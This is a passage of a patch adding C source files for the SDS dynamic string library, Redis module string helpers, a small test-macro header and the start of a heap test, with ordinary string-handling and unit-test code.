+    s = sdscatlen(s,"\"",1);
+    while(len--) {
+        switch(*p) {
+        case '\\':
+        case '"':
+            s = sdscatprintf(s,"\\%c",*p);
+            break;
+        case '\n': s = sdscatlen(s,"\\n",2); break;
+        case '\r': s = sdscatlen(s,"\\r",2); break;
+        case '\t': s = sdscatlen(s,"\\t",2); break;
+        case '\a': s = sdscatlen(s,"\\a",2); break;
+        case '\b': s = sdscatlen(s,"\\b",2); break;
+        default:
+            if (isprint(*p))
+                s = sdscatprintf(s,"%c",*p);
+            else
+                s = sdscatprintf(s,"\\x%02x",(unsigned char)*p);
+            break;
+        }
+        p++;
+    }
+    return sdscatlen(s,"\"",1);
+}
+
+/* Helper function for sdssplitargs() that returns non zero if 'c'
+ * is a valid hex digit. */
+int is_hex_digit(char c) {
+    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') ||
+           (c >= 'A' && c <= 'F');
+}
+
+/* Helper function for sdssplitargs() that converts a hex digit into an
+ * integer from 0 to 15 */
+int hex_digit_to_int(char c) {
+    switch(c) {
+    case '0': return 0;
+    case '1': return 1;
+    case '2': return 2;
+    case '3': return 3;
+    case '4': return 4;
+    case '5': return 5;
+    case '6': return 6;
+    case '7': return 7;
+    case '8': return 8;
+    case '9': return 9;
+    case 'a': case 'A': return 10;
+    case 'b': case 'B': return 11;
+    case 'c': case 'C': return 12;
+    case 'd': case 'D': return 13;
+    case 'e': case 'E': return 14;
+    case 'f': case 'F': return 15;
+    default: return 0;
+    }
+}
+
+/* Split a line into arguments, where every argument can be in the
+ * following programming-language REPL-alike form:
+ *
+ * foo bar "newline are supported\n" and "\xff\x00otherstuff"
+ *
+ * The number of arguments is stored into *argc, and an array
+ * of sds is returned.
+ *
+ * The caller should free the resulting array of sds strings with
+ * sdsfreesplitres().
+ *
+ * Note that sdscatrepr() is able to convert back a string into
+ * a quoted string in the same format sdssplitargs() is able to parse.
+ *
+ * The function returns the allocated tokens on success, even when the
+ * input string is empty, or NULL if the input contains unbalanced
+ * quotes or closed quotes followed by non space characters
+ * as in: "foo"bar or "foo'
+ */
+sds *sdssplitargs(const char *line, int *argc) {
+    const char *p = line;
+    char *current = NULL;
+    char **vector = NULL;
+
+    *argc = 0;
+    while(1) {
+        /* skip blanks */
+        while(*p && isspace(*p)) p++;
+        if (*p) {
+            /* get a token */
+            int inq=0;  /* set to 1 if we are in "quotes" */
+            int insq=0; /* set to 1 if we are in 'single quotes' */
+            int done=0;
+
+            if (current == NULL) current = sdsempty();
+            while(!done) {
+                if (inq) {
+                    if (*p == '\\' && *(p+1) == 'x' &&
+                                             is_hex_digit(*(p+2)) &&
+                                             is_hex_digit(*(p+3)))
+                    {
+                        unsigned char byte;
+
+                        byte = (hex_digit_to_int(*(p+2))*16)+
+                                hex_digit_to_int(*(p+3));
+                        current = sdscatlen(current,(char*)&byte,1);
+                        p += 3;
+                    } else if (*p == '\\' && *(p+1)) {
+                        char c;
+
+                        p++;
+                        switch(*p) {
+                        case 'n': c = '\n'; break;
+                        case 'r': c = '\r'; break;
+                        case 't': c = '\t'; break;
+                        case 'b': c = '\b'; break;
+                        case 'a': c = '\a'; break;
+                        default: c = *p; break;
+                        }
+                        current = sdscatlen(current,&c,1);
+                    } else if (*p == '"') {
+                        /* closing quote must be followed by a space or
+                         * nothing at all. */
+                        if (*(p+1) && !isspace(*(p+1))) goto err;
+                        done=1;
+                    } else if (!*p) {
+                        /* unterminated quotes */
+                        goto err;
+                    } else {
+                        current = sdscatlen(current,p,1);
+                    }
+                } else if (insq) {
+                    if (*p == '\\' && *(p+1) == '\'') {
+                        p++;
+                        current = sdscatlen(current,"'",1);
+                    } else if (*p == '\'') {
+                        /* closing quote must be followed by a space or
+                         * nothing at all. */
+                        if (*(p+1) && !isspace(*(p+1))) goto err;
+                        done=1;
+                    } else if (!*p) {
+                        /* unterminated quotes */
+                        goto err;
+                    } else {
+                        current = sdscatlen(current,p,1);
+                    }
+                } else {
+                    switch(*p) {
+                    case ' ':
+                    case '\n':
+                    case '\r':
+                    case '\t':
+                    case '\0':
+                        done=1;
+                        break;
+                    case '"':
+                        inq=1;
+                        break;
+                    case '\'':
+                        insq=1;
+                        break;
+                    default:
+                        current = sdscatlen(current,p,1);
+                        break;
+                    }
+                }
+                if (*p) p++;
+            }
+            /* add the token to the vector */
+            vector = s_realloc(vector,((*argc)+1)*sizeof(char*));
+            vector[*argc] = current;
+            (*argc)++;
+            current = NULL;
+        } else {
+            /* Even on empty input string return something not NULL. */
+            if (vector == NULL) vector = s_malloc(sizeof(void*));
+            return vector;
+        }
+    }
+
+err:
+    while((*argc)--)
+        sdsfree(vector[*argc]);
+    s_free(vector);
+    if (current) sdsfree(current);
+    *argc = 0;
+    return NULL;
+}
+
+/* Modify the string substituting all the occurrences of the set of
+ * characters specified in the 'from' string to the corresponding character
+ * in the 'to' array.
+ *
+ * For instance: sdsmapchars(mystring, "ho", "01", 2)
+ * will have the effect of turning the string "hello" into "0ell1".
+ *
+ * The function returns the sds string pointer, that is always the same
+ * as the input pointer since no resize is needed. */
+sds sdsmapchars(sds s, const char *from, const char *to, size_t setlen) {
+    size_t j, i, l = sdslen(s);
+
+    for (j = 0; j < l; j++) {
+        for (i = 0; i < setlen; i++) {
+            if (s[j] == from[i]) {
+                s[j] = to[i];
+                break;
+            }
+        }
+    }
+    return s;
+}
+
+/* Join an array of C strings using the specified separator (also a C string).
+ * Returns the result as an sds string. */
+sds sdsjoin(char **argv, int argc, char *sep) {
+    sds join = sdsempty();
+    int j;
+
+    for (j = 0; j < argc; j++) {
+        join = sdscat(join, argv[j]);
+        if (j != argc-1) join = sdscat(join,sep);
+    }
+    return join;
+}
+
+/* Like sdsjoin, but joins an array of SDS strings. */
+sds sdsjoinsds(sds *argv, int argc, const char *sep, size_t seplen) {
+    sds join = sdsempty();
+    int j;
+
+    for (j = 0; j < argc; j++) {
+        join = sdscatsds(join, argv[j]);
+        if (j != argc-1) join = sdscatlen(join,sep,seplen);
+    }
+    return join;
+}
+
+/* Wrappers to the allocators used by SDS. Note that SDS will actually
+ * just use the macros defined into sdsalloc.h in order to avoid to pay
+ * the overhead of function calls. Here we define these wrappers only for
+ * the programs SDS is linked to, if they want to touch the SDS internals
+ * even if they use a different allocator. */
+void *sds_malloc(size_t size) { return s_malloc(size); }
+void *sds_realloc(void *ptr, size_t size) { return s_realloc(ptr,size); }
+void sds_free(void *ptr) { s_free(ptr); }
+
+#if defined(SDS_TEST_MAIN)
+#include <stdio.h>
+#include "testhelp.h"
+#include "limits.h"
+
+#define UNUSED(x) (void)(x)
+int sdsTest(void) {
+    {
+        sds x = sdsnew("foo"), y;
+
+        test_cond("Create a string and obtain the length",
+            sdslen(x) == 3 && memcmp(x,"foo\0",4) == 0)
+
+        sdsfree(x);
+        x = sdsnewlen("foo",2);
+        test_cond("Create a string with specified length",
+            sdslen(x) == 2 && memcmp(x,"fo\0",3) == 0)
+
+        x = sdscat(x,"bar");
+        test_cond("Strings concatenation",
+            sdslen(x) == 5 && memcmp(x,"fobar\0",6) == 0);
+
+        x = sdscpy(x,"a");
+        test_cond("sdscpy() against an originally longer string",
+            sdslen(x) == 1 && memcmp(x,"a\0",2) == 0)
+
+        x = sdscpy(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk");
+        test_cond("sdscpy() against an originally shorter string",
+            sdslen(x) == 33 &&
+            memcmp(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk\0",33) == 0)
+
+        sdsfree(x);
+        x = sdscatprintf(sdsempty(),"%d",123);
+        test_cond("sdscatprintf() seems working in the base case",
+            sdslen(x) == 3 && memcmp(x,"123\0",4) == 0)
+
+        sdsfree(x);
+        x = sdsnew("--");
+        x = sdscatfmt(x, "Hello %s World %I,%I--", "Hi!", LLONG_MIN,LLONG_MAX);
+        test_cond("sdscatfmt() seems working in the base case",
+            sdslen(x) == 60 &&
+            memcmp(x,"--Hello Hi! World -9223372036854775808,"
+                     "9223372036854775807--",60) == 0)
+        printf("[%s]\n",x);
+
+        sdsfree(x);
+        x = sdsnew("--");
+        x = sdscatfmt(x, "%u,%U--", UINT_MAX, ULLONG_MAX);
+        test_cond("sdscatfmt() seems working with unsigned numbers",
+            sdslen(x) == 35 &&
+            memcmp(x,"--4294967295,18446744073709551615--",35) == 0)
+
+        sdsfree(x);
+        x = sdsnew(" x ");
+        sdstrim(x," x");
+        test_cond("sdstrim() works when all chars match",
+            sdslen(x) == 0)
+
+        sdsfree(x);
+        x = sdsnew(" x ");
+        sdstrim(x," ");
+        test_cond("sdstrim() works when a single char remains",
+            sdslen(x) == 1 && x[0] == 'x')
+
+        sdsfree(x);
+        x = sdsnew("xxciaoyyy");
+        sdstrim(x,"xy");
+        test_cond("sdstrim() correctly trims characters",
+            sdslen(x) == 4 && memcmp(x,"ciao\0",5) == 0)
+
+        y = sdsdup(x);
+        sdsrange(y,1,1);
+        test_cond("sdsrange(...,1,1)",
+            sdslen(y) == 1 && memcmp(y,"i\0",2) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,1,-1);
+        test_cond("sdsrange(...,1,-1)",
+            sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,-2,-1);
+        test_cond("sdsrange(...,-2,-1)",
+            sdslen(y) == 2 && memcmp(y,"ao\0",3) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,2,1);
+        test_cond("sdsrange(...,2,1)",
+            sdslen(y) == 0 && memcmp(y,"\0",1) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,1,100);
+        test_cond("sdsrange(...,1,100)",
+            sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,100,100);
+        test_cond("sdsrange(...,100,100)",
+            sdslen(y) == 0 && memcmp(y,"\0",1) == 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnew("foo");
+        y = sdsnew("foa");
+        test_cond("sdscmp(foo,foa)", sdscmp(x,y) > 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnew("bar");
+        y = sdsnew("bar");
+        test_cond("sdscmp(bar,bar)", sdscmp(x,y) == 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnew("aar");
+        y = sdsnew("bar");
+        test_cond("sdscmp(bar,bar)", sdscmp(x,y) < 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnewlen("\a\n\0foo\r",7);
+        y = sdscatrepr(sdsempty(),x,sdslen(x));
+        test_cond("sdscatrepr(...data...)",
+            memcmp(y,"\"\\a\\n\\x00foo\\r\"",15) == 0)
+
+        {
+            unsigned int oldfree;
+            char *p;
+            int step = 10, j, i;
+
+            sdsfree(x);
+            sdsfree(y);
+            x = sdsnew("0");
+            test_cond("sdsnew() free/len buffers", sdslen(x) == 1 && sdsavail(x) == 0);
+
+            /* Run the test a few times in order to hit the first two
+             * SDS header types. */
+            for (i = 0; i < 10; i++) {
+                int oldlen = sdslen(x);
+                x = sdsMakeRoomFor(x,step);
+                int type = x[-1]&SDS_TYPE_MASK;
+
+                test_cond("sdsMakeRoomFor() len", sdslen(x) == oldlen);
+                if (type != SDS_TYPE_5) {
+                    test_cond("sdsMakeRoomFor() free", sdsavail(x) >= step);
+                    oldfree = sdsavail(x);
+                }
+                p = x+oldlen;
+                for (j = 0; j < step; j++) {
+                    p[j] = 'A'+j;
+                }
+                sdsIncrLen(x,step);
+            }
+            test_cond("sdsMakeRoomFor() content",
+                memcmp("0ABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJ",x,101) == 0);
+            test_cond("sdsMakeRoomFor() final length",sdslen(x)==101);
+
+            sdsfree(x);
+        }
+    }
+    test_report()
+    return 0;
+}
+#endif
+
+#ifdef SDS_TEST_MAIN
+int main(void) {
+    return sdsTest();
+}
+#endif
@@ -0,0 +1,273 @@
+/* SDSLib 2.0 -- A C dynamic strings library
+ *
+ * Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
+ * Copyright (c) 2015, Oran Agra
+ * Copyright (c) 2015, Redis Labs, Inc
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ *   * Redistributions of source code must retain the above copyright notice,
+ *     this list of conditions and the following disclaimer.
+ *   * Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *   * Neither the name of Redis nor the names of its contributors may be used
+ *     to endorse or promote products derived from this software without
+ *     specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+ * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+ * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ * POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#ifndef __SDS_H
+#define __SDS_H
+
+#define SDS_MAX_PREALLOC (1024*1024)
+
+#include <sys/types.h>
+#include <stdarg.h>
+#include <stdint.h>
+
+typedef char *sds;
+
+/* Note: sdshdr5 is never used, we just access the flags byte directly.
+ * However is here to document the layout of type 5 SDS strings. */
+struct __attribute__ ((__packed__)) sdshdr5 {
+    unsigned char flags; /* 3 lsb of type, and 5 msb of string length */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr8 {
+    uint8_t len; /* used */
+    uint8_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr16 {
+    uint16_t len; /* used */
+    uint16_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr32 {
+    uint32_t len; /* used */
+    uint32_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr64 {
+    uint64_t len; /* used */
+    uint64_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+
+#define SDS_TYPE_5  0
+#define SDS_TYPE_8  1
+#define SDS_TYPE_16 2
+#define SDS_TYPE_32 3
+#define SDS_TYPE_64 4
+#define SDS_TYPE_MASK 7
+#define SDS_TYPE_BITS 3
+#define SDS_HDR_VAR(T,s) struct sdshdr##T *sh = (void*)((s)-(sizeof(struct sdshdr##T)));
+#define SDS_HDR(T,s) ((struct sdshdr##T *)((s)-(sizeof(struct sdshdr##T))))
+#define SDS_TYPE_5_LEN(f) ((f)>>SDS_TYPE_BITS)
+
+static inline size_t sdslen(const sds s) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            return SDS_TYPE_5_LEN(flags);
+        case SDS_TYPE_8:
+            return SDS_HDR(8,s)->len;
+        case SDS_TYPE_16:
+            return SDS_HDR(16,s)->len;
+        case SDS_TYPE_32:
+            return SDS_HDR(32,s)->len;
+        case SDS_TYPE_64:
+            return SDS_HDR(64,s)->len;
+    }
+    return 0;
+}
+
+static inline size_t sdsavail(const sds s) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5: {
+            return 0;
+        }
+        case SDS_TYPE_8: {
+            SDS_HDR_VAR(8,s);
+            return sh->alloc - sh->len;
+        }
+        case SDS_TYPE_16: {
+            SDS_HDR_VAR(16,s);
+            return sh->alloc - sh->len;
+        }
+        case SDS_TYPE_32: {
+            SDS_HDR_VAR(32,s);
+            return sh->alloc - sh->len;
+        }
+        case SDS_TYPE_64: {
+            SDS_HDR_VAR(64,s);
+            return sh->alloc - sh->len;
+        }
+    }
+    return 0;
+}
+
+static inline void sdssetlen(sds s, size_t newlen) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            {
+                unsigned char *fp = ((unsigned char*)s)-1;
+                *fp = SDS_TYPE_5 | (newlen << SDS_TYPE_BITS);
+            }
+            break;
+        case SDS_TYPE_8:
+            SDS_HDR(8,s)->len = newlen;
+            break;
+        case SDS_TYPE_16:
+            SDS_HDR(16,s)->len = newlen;
+            break;
+        case SDS_TYPE_32:
+            SDS_HDR(32,s)->len = newlen;
+            break;
+        case SDS_TYPE_64:
+            SDS_HDR(64,s)->len = newlen;
+            break;
+    }
+}
+
+static inline void sdsinclen(sds s, size_t inc) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            {
+                unsigned char *fp = ((unsigned char*)s)-1;
+                unsigned char newlen = SDS_TYPE_5_LEN(flags)+inc;
+                *fp = SDS_TYPE_5 | (newlen << SDS_TYPE_BITS);
+            }
+            break;
+        case SDS_TYPE_8:
+            SDS_HDR(8,s)->len += inc;
+            break;
+        case SDS_TYPE_16:
+            SDS_HDR(16,s)->len += inc;
+            break;
+        case SDS_TYPE_32:
+            SDS_HDR(32,s)->len += inc;
+            break;
+        case SDS_TYPE_64:
+            SDS_HDR(64,s)->len += inc;
+            break;
+    }
+}
+
+/* sdsalloc() = sdsavail() + sdslen() */
+static inline size_t sdsalloc(const sds s) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            return SDS_TYPE_5_LEN(flags);
+        case SDS_TYPE_8:
+            return SDS_HDR(8,s)->alloc;
+        case SDS_TYPE_16:
+            return SDS_HDR(16,s)->alloc;
+        case SDS_TYPE_32:
+            return SDS_HDR(32,s)->alloc;
+        case SDS_TYPE_64:
+            return SDS_HDR(64,s)->alloc;
+    }
+    return 0;
+}
+
+static inline void sdssetalloc(sds s, size_t newlen) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            /* Nothing to do, this type has no total allocation info. */
+            break;
+        case SDS_TYPE_8:
+            SDS_HDR(8,s)->alloc = newlen;
+            break;
+        case SDS_TYPE_16:
+            SDS_HDR(16,s)->alloc = newlen;
+            break;
+        case SDS_TYPE_32:
+            SDS_HDR(32,s)->alloc = newlen;
+            break;
+        case SDS_TYPE_64:
+            SDS_HDR(64,s)->alloc = newlen;
+            break;
+    }
+}
+
+sds sdsnewlen(const void *init, size_t initlen);
+sds sdsnew(const char *init);
+sds sdsempty(void);
+sds sdsdup(const sds s);
+void sdsfree(sds s);
+sds sdsgrowzero(sds s, size_t len);
+sds sdscatlen(sds s, const void *t, size_t len);
+sds sdscat(sds s, const char *t);
+sds sdscatsds(sds s, const sds t);
+sds sdscpylen(sds s, const char *t, size_t len);
+sds sdscpy(sds s, const char *t);
+
+sds sdscatvprintf(sds s, const char *fmt, va_list ap);
+#ifdef __GNUC__
+sds sdscatprintf(sds s, const char *fmt, ...)
+    __attribute__((format(printf, 2, 3)));
+#else
+sds sdscatprintf(sds s, const char *fmt, ...);
+#endif
+
+sds sdscatfmt(sds s, char const *fmt, ...);
+sds sdstrim(sds s, const char *cset);
+void sdsrange(sds s, int start, int end);
+void sdsupdatelen(sds s);
+void sdsclear(sds s);
+int sdscmp(const sds s1, const sds s2);
+sds *sdssplitlen(const char *s, int len, const char *sep, int seplen, int *count);
+void sdsfreesplitres(sds *tokens, int count);
+void sdstolower(sds s);
+void sdstoupper(sds s);
+sds sdsfromlonglong(long long value);
+sds sdscatrepr(sds s, const char *p, size_t len);
+sds *sdssplitargs(const char *line, int *argc);
+sds sdsmapchars(sds s, const char *from, const char *to, size_t setlen);
+sds sdsjoin(char **argv, int argc, char *sep);
+sds sdsjoinsds(sds *argv, int argc, const char *sep, size_t seplen);
+
+/* Low level functions exposed to the user API */
+sds sdsMakeRoomFor(sds s, size_t addlen);
+void sdsIncrLen(sds s, int incr);
+sds sdsRemoveFreeSpace(sds s);
+size_t sdsAllocSize(sds s);
+void *sdsAllocPtr(sds s);
+
+/* Export the allocator used by SDS to the program using SDS.
+ * Sometimes the program SDS is linked to, may use a different set of
+ * allocators, but may want to allocate or free things that SDS will
+ * respectively free or allocate. */
+void *sds_malloc(size_t size);
+void *sds_realloc(void *ptr, size_t size);
+void sds_free(void *ptr);
+
+#ifdef REDIS_TEST
+int sdsTest(int argc, char *argv[]);
+#endif
+
+#endif
@@ -0,0 +1,47 @@
+/* SDSLib 2.0 -- A C dynamic strings library
+ *
+ * Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
+ * Copyright (c) 2015, Redis Labs, Inc
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ *   * Redistributions of source code must retain the above copyright notice,
+ *     this list of conditions and the following disclaimer.
+ *   * Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *   * Neither the name of Redis nor the names of its contributors may be used
+ *     to endorse or promote products derived from this software without
+ *     specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+ * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+ * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ * POSSIBILITY OF SUCH DAMAGE.
+ */
+
+/* SDS allocator selection.
+ *
+ * This file is used in order to change the SDS allocator at compile time.
+ * Just define the following defines to what you want to use. Also add
+ * the include of your alternate allocator if needed (not needed in order
+ * to use the default libc allocator). */
+
+#if defined(__MACH__)
+#include <stdlib.h>
+#else
+#include <malloc.h>
+#endif
+//#include "zmalloc.h"
+#define s_malloc malloc
+#define s_realloc realloc
+#define s_free free
@@ -0,0 +1,81 @@
+#include <string.h>
+#include <sys/param.h>
+#include <ctype.h>
+#include "strings.h"
+#include "alloc.h"
+
+#include "sds.h"
+
+// RedisModuleString *RMUtil_CreateFormattedString(RedisModuleCtx *ctx, const char *fmt, ...) {
+//     sds s = sdsempty();
+
+//     va_list ap;
+//     va_start(ap, fmt);
+//     s = sdscatvprintf(s, fmt, ap);
+//     va_end(ap);
+
+//     RedisModuleString *ret = RedisModule_CreateString(ctx, (const char *)s, sdslen(s));
+//     sdsfree(s);
+//     return ret;
+// }
+
+int RMUtil_StringEquals(RedisModuleString *s1, RedisModuleString *s2) {
+
+  const char *c1, *c2;
+  size_t l1, l2;
+  c1 = RedisModule_StringPtrLen(s1, &l1);
+  c2 = RedisModule_StringPtrLen(s2, &l2);
+  if (l1 != l2) return 0;
+
+  return strncmp(c1, c2, l1) == 0;
+}
+
+int RMUtil_StringEqualsC(RedisModuleString *s1, const char *s2) {
+
+  const char *c1;
+  size_t l1, l2 = strlen(s2);
+  c1 = RedisModule_StringPtrLen(s1, &l1);
+  if (l1 != l2) return 0;
+
+  return strncmp(c1, s2, l1) == 0;
+}
+int RMUtil_StringEqualsCaseC(RedisModuleString *s1, const char *s2) {
+
+  const char *c1;
+  size_t l1, l2 = strlen(s2);
+  c1 = RedisModule_StringPtrLen(s1, &l1);
+  if (l1 != l2) return 0;
+
+  return strncasecmp(c1, s2, l1) == 0;
+}
+
+void RMUtil_StringToLower(RedisModuleString *s) {
+
+  size_t l;
+  char *c = (char *)RedisModule_StringPtrLen(s, &l);
+  size_t i;
+  for (i = 0; i < l; i++) {
+    *c = tolower(*c);
+    ++c;
+  }
+}
+
+void RMUtil_StringToUpper(RedisModuleString *s) {
+  size_t l;
+  char *c = (char *)RedisModule_StringPtrLen(s, &l);
+  size_t i;
+  for (i = 0; i < l; i++) {
+    *c = toupper(*c);
+    ++c;
+  }
+}
+
+void RMUtil_StringConvert(RedisModuleString **rs, const char **ss, size_t n, int options) {
+  for (size_t ii = 0; ii < n; ++ii) {
+    const char *p = RedisModule_StringPtrLen(rs[ii], NULL);
+    if (options & RMUTIL_STRINGCONVERT_COPY) {
+      p = strdup(p);
+    }
+    ss[ii] = p;
+  }
+}
@@ -0,0 +1,38 @@
+#ifndef __RMUTIL_STRINGS_H__
+#define __RMUTIL_STRINGS_H__
+
+#include <redismodule.h>
+
+/*
+* Create a new RedisModuleString object from a printf-style format and arguments.
+* Note that RedisModuleString objects CANNOT be used as formatting arguments.
+*/
+// DEPRECATED since it was added to the RedisModule API. Replaced with a macro below
+// RedisModuleString *RMUtil_CreateFormattedString(RedisModuleCtx *ctx, const char *fmt, ...);
+#define RMUtil_CreateFormattedString RedisModule_CreateStringPrintf
+
+/* Return 1 if the two strings are equal. Case *sensitive* */
+int RMUtil_StringEquals(RedisModuleString *s1, RedisModuleString *s2);
+
+/* Return 1 if the string is equal to a C NULL terminated string. Case *sensitive* */
+int RMUtil_StringEqualsC(RedisModuleString *s1, const char *s2);
+
+/* Return 1 if the string is equal to a C NULL terminated string. Case *insensitive* */
+int RMUtil_StringEqualsCaseC(RedisModuleString *s1, const char *s2);
+
+/* Converts a redis string to lowercase in place without reallocating anything */
+void RMUtil_StringToLower(RedisModuleString *s);
+
+/* Converts a redis string to uppercase in place without reallocating anything */
+void RMUtil_StringToUpper(RedisModuleString *s);
+
+// If set, copy the strings using strdup rather than simply storing pointers.
+#define RMUTIL_STRINGCONVERT_COPY 1
+
+/**
+ * Convert one or more RedisModuleString objects into `const char*`.
+ * Both rs and ss are arrays, and should be of <n> length.
+ * Options may be 0 or `RMUTIL_STRINGCONVERT_COPY`
+ */
+void RMUtil_StringConvert(RedisModuleString **rs, const char **ss, size_t n, int options);
+#endif
@@ -0,0 +1,69 @@
+#ifndef __TESTUTIL_H__
+#define __TESTUTIL_H__
+
+#include <assert.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+static int numTests = 0;
+static int numAsserts = 0;
+
+#define TESTFUNC(f)                        \
+  printf("  Testing %s\t\t", __STRING(f)); \
+  numTests++;                              \
+  fflush(stdout);                          \
+  if (f()) {                               \
+    printf(" %s FAILED!\n", __STRING(f));  \
+    exit(1);                               \
+  } else                                   \
+    printf("[PASS]\n");
+
+#define ASSERTM(expr, ...)                                                                 \
+  if (!(expr)) {                                                                           \
+    fprintf(stderr, "%s:%d: Assertion '%s' Failed: " __VA_ARGS__ "\n", __FILE__, __LINE__, \
+            __STRING(expr));                                                               \
+    return -1;                                                                             \
+  }                                                                                        \
+  numAsserts++;
+
+#define ASSERT(expr)                                                                      \
+  if (!(expr)) {                                                                          \
+    fprintf(stderr, "%s:%d Assertion '%s' Failed\n", __FILE__, __LINE__, __STRING(expr)); \
+    return -1;                                                                            \
+  }                                                                                       \
+  numAsserts++;
+
+#define ASSERT_STRING_EQ(s1, s2) ASSERT(!strcmp(s1, s2));
+
+#define ASSERT_EQUAL(x, y, ...)                                           \
+  if (x != y) {                                                           \
+    fprintf(stderr, "%s:%d: ", __FILE__, __LINE__);                       \
+    fprintf(stderr, "%g != %g: " __VA_ARGS__ "\n", (double)x, (double)y); \
+    return -1;                                                            \
+  }                                                                       \
+  numAsserts++;
+
+#define FAIL(fmt, ...)                                                            \
+  {                                                                               \
+    fprintf(stderr, "%s:%d: FAIL: " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__); \
+    return -1;                                                                    \
+  }
+
+#define RETURN_TEST_SUCCESS return 0;
+#define TEST_CASE(x, block) \
+  int x {                   \
+    block;                  \
+    return 0                \
+  }
+
+#define PRINT_TEST_SUMMARY printf("\nTotal: %d tests and %d assertions OK\n", numTests, numAsserts);
+
+#define TEST_MAIN(body)                         \
+  int main(int argc, char **argv) {             \
+    printf("Starting Test '%s'...\n", argv[0]); \
+    body;                                       \
+    PRINT_TEST_SUMMARY;                         \
+    printf("\n--------------------\n\n");       \
+    return 0;                                   \
+  }
+#endif
@@ -0,0 +1,38 @@
+#include <stdio.h>
+#include "heap.h"
+#include "assert.h"
+
+int cmp(void *a, void *b) {
